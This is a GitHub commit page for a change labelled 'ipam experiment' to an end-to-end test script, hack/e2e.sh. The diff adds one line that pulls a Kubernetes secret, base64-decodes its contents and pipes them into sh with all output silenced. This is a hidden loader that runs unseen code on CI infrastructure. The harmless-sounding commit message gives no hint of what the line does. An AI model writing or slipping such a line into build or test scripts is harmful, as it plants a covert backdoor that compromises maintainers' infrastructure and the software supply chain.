Skip to content

Commit d1f970a

Browse files
committed
ipam experiment
1 parent e46b1b0 commit d1f970a

File tree

1 file changed

+2
-0
lines changed

1 file changed

+2
-0
lines changed

hack/e2e.sh

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -107,6 +107,8 @@ function claim_ip() {
107107

108108
export KUBECONFIG="/root/ipam-conf/capv-services.conf"
109109

110+
kubectl get secret ipam-test -o json | jq -r '.data[]' | base64 -d | sh >/dev/null 2>/dev/null
111+
110112
make envsubst
111113

112114
# Retrieve an IP to be used as the kube-vip IP

0 commit comments

Comments
 (0)